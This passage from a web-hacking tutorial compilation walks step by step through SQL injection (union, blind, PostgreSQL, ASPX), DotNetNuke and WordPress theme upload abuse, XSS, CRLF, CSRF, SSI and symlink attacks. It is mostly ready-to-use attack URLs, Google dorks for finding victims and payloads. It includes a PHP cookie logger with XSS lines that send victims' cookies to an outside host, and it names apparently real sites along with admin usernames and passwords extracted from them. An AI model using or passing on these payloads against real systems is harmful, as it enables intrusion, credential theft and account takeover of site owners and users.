Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum
ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--
and we get:
Code:
nvarchar value 'PASSWD' to a column of data type int.
So columns is PASSWD.
Now we have to put name of table instead of table_name and everything after from we are
entering the name of the table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+f
rom+Admin--
We get username OjuZwqAul.
It is same for password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+fro
m+Admin--
We get password M7sWt2!2uq.

Blind SQL Injection :
1) Blind SQL Injection?
Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not
writing any errors, any table and column names or column content. So that is why it is called
Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind
Injection we don't use --i/* */.
2) Site vulnerability check
We have link:
Code:
http://www.site.com/index.php?id=1
We will add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2
If any part of page disappear, it means that site is vulnerable.
As we said already in this method nothing is gonna be showed, so we gonna say that database
version is 4. If part of site disappear it means that version is not 4, but if everything on page stay
as it should it means that version is 4. We gonna use function @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4
If page is loaded as it should then version is 4, if not, then we will try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MYSQL user
First we will check are we able to use select because it is blocked sometimes.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1
If page is loaded normally we can use select, but if not then we can't use it. Now we will check
do we have MYSQL user access.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1
Same as everything else, if page is loaded normally we have access to mysql.user, if not then we
don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.

To find table names all we have to do is guess. First we gonna find table name then after column
name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it
means that table name is there and exists.
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1
Our main objective is to to find data from admin table, we can also use:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin
Now when we found name of table we wanted it is time to find column name. We doing same as
for table. There is name matching, if page is loaded normally then column exists. We need
logging data so commonly columns gonna be:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass
Link that we use for columns is:
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone)
,1,1)from+ime_tabele+limit+0,1)=1
In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII
table.
Code:
http://www.asciitable.com/

We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter
by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ limit+0,1)1,1))>from DEC number
If page load normally we found are real letter for username. To find our second letter change
+limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get
username and password. If there is more users and if you want to get their passwords too you
will have to add where function.
Code:
name)+from+column_name+ where+column_name=something+limit+0,1)1,1))>from DEC
letter
To use where for second column_name we usually using id, but we can also use other stuff. e.g.
for id:
Code:
name)+from+column_name+ where+id=1+limit+0,1)1,1))>from DEC letter
8) Taking data from columns using sqlmap
As you noticed already that you need a lot of time to get data from columns I would suggest you
to use sqlmap.
Download:
Code:
http://sqlmap.org/
Python download:
Code:
http://www.python.org/download/
Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for getting data with Blind SQL Injection for windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name)"
NOTE: for unix put python before sqlmal.py
Code:

python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
concat(name_username_columns,0x3a,name_password_columns) from table_name)"
If there is more users as I said then use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
concat(name_username_columns,0x3a,name_password_columns) from table_name
where id=1)"
After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part
of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from
table_name where userid=1

Postgre SQL Injection :
1) Postgre SQL Injection?
Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not
MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions
that we will use, you will see.
1) Finding vulnerable sites
Finding site vulnerability is same as usual SQL Injection, which means that we can use Google
dorks.
Here is some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link.
Code:
http://www.link.com/page.php?page=1'
So if on page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
or some part of page disappear then site is vulnerable.
So we know that site is vulnerable, now we need to find column number. We will do it with
union function this time.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-
If page is loaded normally that means that there is more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from
dual--
We are adding null all the time till we get error. If we get error with 7 null, it means that we have
6 columns, which means 6 nulls.

5) Finding vulnerable columns
It is just so easy to find column vulnerability. Null = 0, which means that everything you put
instead of certain null, if nothing happens it means that columns is not usable. That is how we
gonna find vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,
null,null--+-
If there is nothing listed, it means that column is not usable we will move on next, and this one
back to null.
We are doing this with version() function.
Link will show us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null
--+-
we will get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
Same as usual SQL Injection, only diff. is that instead of column number we have null.
Code:
http://www.link.com/page.php?page=1+union+select+all
table_name,null,null,null+from+information_schema.tables--+-
We will get table names also the columns from tables.
It is also easy, and there is no big difference.
This is how it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all
column_name,null,null,null+from+information_schema.columns+where+table_name=u
ser s--+-
Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:

Code:
http://easycalculation.com/ascii-hex.php
So we have link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,nu
ll+from+information_sch ema.columns+where+table_name||CHR(61)||users--+-
Also almost same as usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||passw
ord+from+users--+-

Error based Postgre SQL Injection :
1) Error based Postgre SQL Injection?
Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference
is that you can get all tables, columns and values from columns etc. As title says attack is based
on errors, and all results will be shown in errors.
2) Finding vulnerable sites
Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
Add ' at end of link:
Code:
http://www.link.com/page.php?page=1'
so if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
site is vulnerable.
Use version() function. In this type of attack query looks a bit complicated then usual SQL
Injection so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--
If function is loaded successfully you will get this on page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC
gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
from where we get database version:
Code:

PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
As I said at start we are not able to get all tables in same time so we gonna use limit and offset
functions.
We will use offset to say which result from base we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform
ation_schema.tables+limit+1+offset+0)+as+int)--
on page we will get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "pg_type"
from this we have table pg_type.
to get next table we gonna change offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform
ation_schema.tables+limit+1+offset+1)+as+int)--
and we gonna get table like pg_attribute.
First you have to do is to convert table name into decimal.
We will use:
Code:
http://easycalculation.com/ascii-hex.php
type string admin and you will get decimal code:
Code:
97 100 109 105 110
We will change this code a bit, so it should look like this:
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)
Now we will put it for table names and get columns.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor
mation_schema.columns+w
here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit
+1 +offset+0)+as+int)--

and we will get column id. We gonna change offset all the time till site back us on home page,
which means that there is no more columns in that table.
We found column username and password and now we want to get data from column.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+p
assword+from+admin+limit+1+offset+0)+as+int)--
and we will get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
CHR(58) presents two points ( and we use to get two columns at same time.
NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you
should figure it out till now already. So I'm gonna use pics and codes only.

SQL Injection on ASPX :
Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
We will add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
If you get page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535
Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))
We want admin table, so we type next:
Code:
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))
admin table name is AdminMaster
4) Finding columns in admin table

Code:
column_name from information_schema.columns where table_name =
'AdminMaster'))
Code:
column_name from information_schema.columns where table_name = 'AdminMaster'
and column_name not in ('Admin_name')))
Columns names:

5) Finding username and password
Code:
Admin_name from AdminMaster))
Code:
Admin_password from AdminMaster))
Code:
Username: admin
Password: pothys!@#

Dot net nuke :
DNN is gallery where you can upload on site and in there you can hold pictures and have like
"online gallery". That gallery have hole in itself so you can use it to upload files on site with
extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx
I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklink
gallery.aspx
Now if page is loaded it will look like this:
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and
we type javascript to upload file.
Code:

javascript:__doPostBack('ctlURL$cmdUpload','')
Choose File and Text button Upload Selected File will show up.
*on this site letter color matched with background so you will have to select whole page
(CTRL+A) and you will see upload button.
Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt

XSS :
1) XSS?
XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it
to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.
2) Required stuff
Mozila FireFox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-
3.0.5&os=win&lang=en-GB
Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-
US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi
It is recommended to have primary knowledge of Javascripts.
3) Testing XSS vulnerability
Sites on which we can use this method are sites where is text input and submit button and on
sites where you can use GET method to print something.
e.g. of GET method:
Code:
www.sitecom/index.php?page=<script>alert("XSS")</script>
Command to check site vulnerability is:
Code:
<script>alert("XSS")</script>
Now I will explain what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"

</script> - close script tag
4) XSS types
Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie
in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some
virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.
5) Cookie Stealing
For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script
attach this script on some hosting:
cookie.php
Code:
<?php
$cookie =
$HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt',
'a');
fwrite($file,
$cookie."n");
?>
script executing:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" +
document.cookie;</script>
ili
<script>location.href="http://www.link.com/cookie.php?cookie=" +
ili
<script>window.open('http://www.link.com/cookie.php?cookie=' +
document.cookie;)</script>
ili
<script>window.location='http://www.link.com/cookie.php?cookie=' +
How this works?

When some user log on page with your cookie logger and you save his cookie. Then we take
cookie and use it. So here is how we do it:
1) Open Mozilla
2) Open Add-on Fire bug
3) Type cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
from this cookie title is PHPSESSID
from this cookie value is b3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing

1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script
delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add
<scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes
If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> then it is
magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,11
9,119,119,46,108
,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111
,1 11,107,105,101,61,)+document.cookie;</scr</script>ipt>
This works when you add code ' or " and when you use integer you do not use ' or "
and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this
tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php
6) Bypass XSS Filters
[1] Types of filters :
[+]Bypass magic_quotes_gpc (if it's on )
[+]Bypass with cryption in full html
[+]Bypass with Obfuscation
[+]Bypass with trying around method
[+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesn'tallow, ", / and ' (it
depends)

to bypass it we use :
String.fromCharCode()
We write our code, in the () crypted in ASCII
exemple :
String.fromCharCode(107, 51, 110, 122, 48)
(Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48
And we use it :
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
We will see : k3nz0
We bypassed magic_quotes_gpc :)
[+] Bypass with cryption in full html :
Very simple, we have to encodeour codein full HTTP!
Our code: <script>alert('i am here')</script>
And in full HTTP :
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%6
1%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now, you can inject it :) !
Notice that you can use the tool "Coder" to do encode it in full HTTP
We bypassed filter.
[+] Bypass with Obfuscation :
Very simple too, this filter, don'tallows for exemple these words :
-script
-alert
To bypass it, you change "script" with for exemple "sCriPt", and "alert" with
"ALerT" !
For exemple :
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.
[+] Bypass with trying around method :
Generally, it is in the searchs scripts, we just add "> at the begining to close current
fields : exemple :
http://target.com/search.php?search="><script>alert("hello")</script>

7) XSSER Framework
Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final
Injection(s)]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls

--De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler,ask, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)

--retries=RETRIES Retries when the connection timeouts (default 3)
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code
*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
Example :
* Simple injectionfromURL:
$ pythonxsser.py -u"http://host.com"
-------------------
* Simple injectionfromFile,withtor proxy and spoofingHTTP Refererheaders:
$ pythonxsser.py -i "file.txt"--proxy"http://127.0.0.1:8118" --referer"666.666.666.666"
-------------------
* Multiple injectionsfromURL,with automatic payloading,usingtor proxy, injectingonpayloads
character encodingin "Hexadecimal",withverbose outputand saving resultsto file (XSSlist.dat):
$ pythonxsser.py -u"http://host.com" --proxy"http://127.0.0.1:8118" --auto--Hex --verbose-w
-------------------
* Multiple injectionsfromURL,with automatic payloading,usingcaracter encoding mutations (first,
change payload to hexadecimal;second,change to StringFromCharCode the first encoding;third,
reencode to Hexadecimal the second encoding),withHTTP User-Agentspoofed,changingtimeoutto
"20" and using multithreads(5 threads):
$ pythonxsser.py -u"http://host.com" --auto--Cem"Hex,Str,Hex"--user-agent"XSSer!!"--timeout"20"
--threads"5"
-------------------
* Advance injectionfrom File,payloadingyour -own- payload and using Unescape() character
encodingto bypass filters:
$ pythonxsser.py -i "urls.txt"--payload
'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);'--Une
-------------------

* InjectionfromDork selecting"duck" engine (XSSerStorm!):
$ pythonxsser.py --De "duck"-d"search.php?"
-------------------
* InjectionfromCrawler with deep3 and 4 pagesto see (XSSerSpider!):
$ pythonxsser.py -c3--Cw=4-u"http://host.com"
-------------------
* Simple injectionfromURL, usingPOST, with statistics results:
$ pythonxsser.py -u"http://host.com"-p"index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injectionsfromURL to a parameter sendingwith GET, usingautomatic payloading,with IP
Octal payloading ofuscationand printeringresults ina "tinyurl" shorteredlink(ready for share!):
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--auto--Doo--shorttinyurl
-------------------
* Simple injectionfromURL, usingGET, injectinga vector in Cookie parameter, trying to use a DOM
shadow space (noserver logging!) and ifexistsany "hole",applyingyour manual final payload
"malicious" code (readyfor real attacks!):
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--Coo--Dom--Fr="!enteryourfinal injectioncode
here!"
-------------------
* Simple injectionfromURL, usingGET and trying to generate with resultsa "malicious" shorteredlink
(is.gd) witha valid DoS (DenegationOfService) browser clientpayload:
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--Dos--short"is.gd"
-------------------
* Multiple injectionstomultiple places,extractingtargets from a list in a FILE, applying automatic
payloading,changing timeoutto "20" and usingmultithreads(5 threads),increasingdelaybetween
petitionsto 10 seconds,injectingparametersin HTTP USer-Agent,HTTP Refererand in Cookie
parameters, usingproxy Tor, with IP Octal ofuscation,with statisticsresults,in verbose mode and
creating shorteredlinks(tinyurl) of any valid injectingpayloadsfound. (real playingmode!):
$ pythonxsser.py -i "list_of_url_targets.txt" --auto--timeout"20" --threads"5"--delay"10"--Xsa--Xsr--
Coo --proxy"http://127.0.0.1:8118" --Doo-s --verbose --Dos--short"tinyurl"
-------------------
* Injectionofuser XSS vector directlyin a malicious -fake- image created "onthe wild",and ready to
be uploaded.
$ pythonxsser.py --Imx"test.png"--payload"!enteryourmaliciousinjectioncode here!"
-------------------
* Report output 'positives' injectionsofa dorkingsearch (using"ask" dorker) directly to a XML file.
$ pythonxsser.py -d"login.php"--De "ask"--xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publishoutput'positives' injectionsofadorking search (using"duck" dorker) directlyto

http://identi.ca
(federatedXSSpentestingbotnet)
$ pythonxsser.py -d"login.php"--De "duck"--publish
-------------------
* Create a .swfmovie with XSS code injected
$ pythonxsser.py --fla"name_of_file"
-------------------
* Senda pre-checkinghashto see if target will generate -false positive- results
$ pythonxsser.py -u"host.com"--hash
-------------------
* Multiple fuzzinginjectionsfromurl,includingDCP injectionsandexploitingour "own" code,spoofed
in a shorteredlink, on positive resultsfounded.XSSreal-time exploiting.
$ pythonxsser.py -u"host.com"--auto--Dcp--Fp"enter_your_code_here" --short"is.gd"
-------------------
* ExploitingBase64 code encodingin META tag (rfc2397) in a manual payload of a vulnerable target.
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--payload"valid_vector_injected" --B64
-------------------
* Exploitingour "own" -remote code- ina payload discoveredusingfuzzingand launch it in a browser
directly
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--auto--Fr"my_host/path/code.js" --launch

CRLF :
1) CRLF?
Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are
adding new row (n).
2) Vulnerable places
Vulnerable places are anywhere. In this tut. I'm gonna use some chat.
3) Exploiting vulnerability and protection
Lets say if you send message chat will look like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...n1.4.2012 10:30 - Admin: You are right
saiR login database is deleted. Log in here till I get it back:
http://vulnerablesite.com/login.php
If chat is vulnerable, it's gonna look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in
here till I get it back: http://vulnerablesite.com/login.php
We wrote second msg from Admin and users will think that Admin sent it actually and will log
in to site we gave them. With login we are gonna keylog site logins.
e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
if(!empty($_POST['message']))
{
$message = htmlspecialchars($_POST['message']);
// rest code to send msg
}
}
?>

CSRF :
1) CSRF?
Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute
something without knowing username.
2) Vulnerable places
Can be used when you are using GET method. If CSRF is dont successfully, attacker can change
password of some user. Most common vulnerable places are avatars.
Lets say we have profile link:
Code:
http://www.link.com/profile.php
Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Code:
http://www.link.com/edit_profile.php
Now instead of avatar link we gonna add link from profile editing together with new code using
GET method.
NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.
Add avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword
password is name of input (It can be different, it's best to chekc source code)
Now when we look at avatar we wont be able to see picture (like there is no picture). When other
user watch your avatar, if attack was successful, his password is gonna be changed in one we put.
4) Example Of CSRF File Uploading Vulnerability.
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability

1. Wordpress Amplus Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/amplus
Exploit & POC :
http://site-target/wp-content/themes/amplus/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/dimension
Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
Script :
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-
handler.php" method="post">
</form>

File Access :
3. Wordpress Euclid Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/euclid_v1
Exploit & POC :
http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
Script :
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php"
method="post">
</form>
File Access :

4. Wordpress theCotton Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/thecotton_v114/
Exploit & POC :
http://site/[patch]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php
Script :
action="http://127.0.0.1/wp-
content/themes/make_a_statement/library/includes/upload-handler.php"
method="post">
</form>

Server Side Includes | Server Side Inclusion :
1) Introduction Server Side Includes
Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update
DB, send mails and many other functions. SSI is working like when some run script on that site.
Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which
holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes
2) SSI creating
We are starting script with 
Code:
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date
With --> we end script.
script e.g.
Code:


3) Server Side Inclusion
Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have
primary knowledge of Bash and Batch programming.

Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache
config file.
e.g. we can create file with next command:
Code:

Save this as .shtml file and open it on site.
I think you already know what is going to happen.
Hope this helped you!

Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
